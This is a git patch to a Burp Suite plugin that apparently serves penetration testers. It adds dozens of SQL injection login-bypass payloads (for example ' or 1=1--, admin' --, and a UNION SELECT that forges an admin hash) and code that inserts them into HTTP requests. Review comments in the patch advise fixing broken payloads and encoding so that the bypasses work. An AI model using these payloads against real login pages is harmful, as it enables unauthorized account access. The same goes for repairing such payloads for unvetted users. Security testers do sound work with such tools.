From a4bb3d6c0b52631927465110e9037c42e863c5fe Mon Sep 17 00:00:00 2001 From: root Date: Sat, 8 Sep 2018 02:59:05 +0500 Subject: [PATCH] Updated SQLi Login bypass --- README.md | 7 +- build/built-jar.properties | 2 +- build/classes/burp/SQL_Menu.class | Bin 2379 -> 2377 bytes nbproject/private/private.xml | 3 + src/burp/SQli_LoginBypass.java | 153 ++++++++++++++++++++++++++++-- 5 files changed, 155 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index 4c085cd..1d8bc33 100644 --- a/README.md +++ b/README.md @@ -19,12 +19,12 @@ ### Download - Download Jar https://github.com/d3vilbug/HackBar/releases and add in burpsuite + Download Jar 'https://github.com/d3vilbug/HackBar/releases' and add in burpsuite ### Tested on - Burpsuite 1.7.36 - Windows 7/8.1/10 -- Kali linux (2013.3) +- Kali linux (2018.3) ### Upcoming Features/Modules - XSS payload @@ -34,9 +34,10 @@ - Reverse Shell Code snippets - Decoder/Encoder - LFI payloads -- XXE +- XXE - RCE - Mini Webshells +- Simulate Attack (Automatically test complete cheat sheet with one click) ### Greet - An0n 3xPloiTeR https://github.com/Anon-Exploiter/ for SQLi && XSS payloads \ No newline at end of file diff --git a/build/built-jar.properties b/build/built-jar.properties index 4f366cd..51a92f8 100644 --- a/build/built-jar.properties +++ b/build/built-jar.properties @@ -1,4 +1,4 @@ -#Fri, 07 Sep 2018 00:39:59 +0500 +#Sat, 08 Sep 2018 01:56:29 +0500 C\:\\Users\\bugzy\\Documents\\NetBeansProjects\\Burp_Plugins\\HackBar= diff --git a/build/classes/burp/SQL_Menu.class b/build/classes/burp/SQL_Menu.class index dd2274621d298cf56b5efbab1d04c85e0f0263a8..8350fd153a73b4df256a5e3730d0119b70fc5ecb 100644 GIT binary patch delta 19 acmX>tbW&(T02>=mQfX0v{^kg_&rASCF9yE= delta 21 ccmX>pbXsUb02>EiQfX0vzHjB`Ft*Q308_jNhX4Qo diff --git a/nbproject/private/private.xml b/nbproject/private/private.xml index 8bb5918..c99654c 100644 --- a/nbproject/private/private.xml +++ b/nbproject/private/private.xml 
@@ -3,7 +3,10 @@ + file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/Methods.java + file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/SQli_LoginBypass.java file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/SQL_Menu.java + file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/BurpExtender.java diff --git a/src/burp/SQli_LoginBypass.java b/src/burp/SQli_LoginBypass.java index af7bf2e..48f1eb8 100644 --- a/src/burp/SQli_LoginBypass.java +++ b/src/burp/SQli_LoginBypass.java @@ -21,7 +21,7 @@ public class SQli_LoginBypass extends JMenu { public String[] Login_Menu = {"Set 1","Set 2","Set 3","Set 4","Set 5"}; public String LoginMenuItems[][] = { {"' or ''='", "' or 1='1", "' or '1'='1", "' or ' 1=1", "' or 1=1--", "' or 1=1#", "' or 1=1/*", "') or '1'='1--", "') or ('1'='1--", "' or 1=1)#"}, - {"' or '1?='1", "' or 'x'='x", "' or 0=0 –", "or 0=0 –", "' or 0=0 #", "or 0=0 #", "' or 'x'='x", "') or ('x'='x", "' or 1=1–", "' or a=a–"}, + {"' or '1?='1", "' or 'x'='x", "' or 0=0 –", "or 0=0 –", "' or 0=0 #", "or 0=0 #", "') or ('x'='x", "' or 1=1–", "' or a=a–"}, {"') or ('a'='a", "hi' or 1=1 –", "'or'1=1?", "'-'", "' '", "'&'", "'^'", "'*'", "' or ''-'", "' or '' '"}, {"' or ''&'", "' or ''^'", "' or ''*'", "or true--", "' or true--", "') or ('x')=('x", "')) or (('x'))=(('x", "admin' --", "admin' #", "admin'/*"}, {"admin' or '1'='1", "admin' or '1'='1'--", "admin' or '1'='1'#", "admin' or '1'='1'/*", "admin'or 1=1 or ''='", "admin') or ('1'='1", "admin') or ('1'='1'/*", "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055"}, 
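Review bot: Five of the payloads in the rows this hunk rewrites still carry a Unicode en dash (U+2013) where the SQL comment token `--` is meant: `' or 0=0 –`, `or 0=0 –`, `' or 1=1–`, `' or a=a–` in set 2 and `hi' or 1=1 –` in set 3. Sent as-is they never open a comment, so the closing quote of the original query stays live and the bypass cannot work even against a vulnerable login; the commit only drops the duplicate `' or 'x'='x` from set 2. I would change them to ASCII `--` (for example `"' or 0=0 --"`, `"or 0=0 --"`) and, since do_loginBypass matches these literals by value in its switch, update the corresponding case labels in the same change. The `?` in `' or '1?='1` and `'or'1=1?` looks like another mis-converted character worth checking against the source cheat sheet. The array initializer's closing `};` lies outside the hunk.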
@@ -57,14 +57,155 @@ public void actionPerformed(ActionEvent e) { String action = e.getActionCommand(); byte[] newRequest = do_loginBypass(request, selectString, action, selectedIndex); req.setRequest(newRequest); - JOptionPane.showMessageDialog(null, action); } public byte[] do_loginBypass(byte[] request, String selectedString, String action, int[] selectedIndex){ -// swtich(action){ -// case " a": -// break; -// } + switch(action){ + case "' or ''='": + selectedString = "' or ''='"; + break; + case "' or 1='1": + selectedString = "' or 1='1"; + break; + case "' or '1'='1": + selectedString = "' or '1'='1"; + break; + case "' or ' 1=1": + selectedString = "' or ' 1=1"; + break; + case "' or 1=1--": + selectedString = "' or 1=1--"; + break; + case "' or 1=1#": + selectedString = "' or 1=1#"; + break; + case "' or 1=1/*": + selectedString = "' or 1=1/*"; + break; + case "') or '1'='1--": + selectedString = "') or '1'='1--"; + break; + case "') or ('1'='1--": + selectedString = "') or ('1'='1--"; + break; + case "' or 1=1)#": + selectedString = "' or 1=1)#"; + break; + case "' or '1?='1": + selectedString = "' or '1?='1"; + break; + case "' or 'x'='x": + selectedString = "' or 'x'='x"; + break; + case "' or 0=0 –": + selectedString = "' or 0=0 –"; + break; + case "or 0=0 –": + selectedString = "or 0=0 –"; + break; + case "' or 0=0 #": + selectedString = "' or 0=0 #"; + break; + case "or 0=0 #": + selectedString = "or 0=0 #"; + break; + case "') or ('x'='x": + selectedString = "') or ('x'='x"; + break; + case "' or 1=1–": + selectedString = "' or 1=1–"; + break; + case "' or a=a–": + selectedString = "' or a=a–"; + break; + case "') or ('a'='a": + selectedString = "') or ('a'='a"; + break; + case "hi' or 1=1 –": + selectedString = "hi' or 1=1 –"; + break; + case "'or'1=1?": + selectedString = "'or'1=1?"; + break; + case "'-'": + selectedString = "'-'"; + break; + case "' '": + selectedString = "' '"; + break; + case "'&'": + selectedString = "'&'"; + break; + case 
"'^'":
+ selectedString = "'^'";
+ break;
+ case "'*'":
+ selectedString = "'*'";
+ break;
+ case "' or ''-'":
+ selectedString = "' or ''-'";
+ break;
+ case "' or '' '":
+ selectedString = "' or '' '";
+ break;
+ case "' or ''&'":
+ selectedString = "' or ''&'";
+ break;
+ case "' or ''^'":
+ selectedString = "' or ''^'";
+ break;
+ case "' or ''*'":
+ selectedString = "' or ''*'";
+ break;
+ case "or true--":
+ selectedString = "or true--";
+ break;
+ case "' or true--":
+ selectedString = "' or true--";
+ break;
+ case "') or ('x')=('x":
+ selectedString = "') or ('x')=('x";
+ break;
+ case "')) or (('x'))=(('x":
+ selectedString = "')) or (('x'))=(('x";
+ break;
+ case "admin' --":
+ selectedString = "admin' --";
+ break;
+ case "admin' #":
+ selectedString = "admin' #";
+ break;
+ case "admin'/*":
+ selectedString = "admin'/*";
+ break;
+ case "admin' or '1'='1":
+ selectedString = "admin' or '1'='1";
+ break;
+ case "admin' or '1'='1'--":
+ selectedString = "admin' or '1'='1'--";
+ break;
+ case "admin' or '1'='1'#":
+ selectedString = "admin' or '1'='1'#";
+ break;
+ case "admin' or '1'='1'/*":
+ selectedString = "admin' or '1'='1'/*";
+ break;
+ case "admin'or 1=1 or ''='":
+ selectedString = "admin'or 1=1 or ''='";
+ break;
+ case "admin') or ('1'='1":
+ selectedString = "admin') or ('1'='1";
+ break;
+ case "admin') or ('1'='1'/*":
+ selectedString = "admin') or ('1'='1'/*";
+ break;
+ case "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055":
+ selectedString = "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055";
+ break;
+ default:
+ selectedString = selectedString;
+ }
+ selectedString = selectedString.replace(" ", "+");
 return Methods.do_modify_request(request, selectedIndex, selectedString);
 }
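Review bot: The new `selectedString = selectedString.replace(" ", "+");` just before the return is not URL encoding: it only rewrites spaces, so payloads containing `#`, `&`, `+`, `%` or `=` (`' or 1=1#`, `'&'`, `admin' #`, `' or ''&'`) reach the request raw, and if the selected region is a query-string or form-urlencoded value, `#` ends the URL at the fragment and `&` splits the payload into a second parameter, so the server never sees it as written. For that case use a real encoder, e.g. `selectedString = URLEncoder.encode(selectedString, "UTF-8");` (it also maps spaces to `+`; wrap the checked UnsupportedEncodingException it declares), and only skip encoding where raw text is wanted such as a header or JSON body — which placement applies is decided inside Methods.do_modify_request, outside this hunk, so I cannot say how it inserts the text. Separately, the 47-case switch is a no-op: every branch assigns `selectedString` the very literal that `action` already holds, `default` self-assigns, and `switch(action)` throws NullPointerException if `action` is ever null, so the whole block reduces to `if (action != null) { selectedString = action; }`, which also removes the chance of the menu strings and the case labels drifting apart.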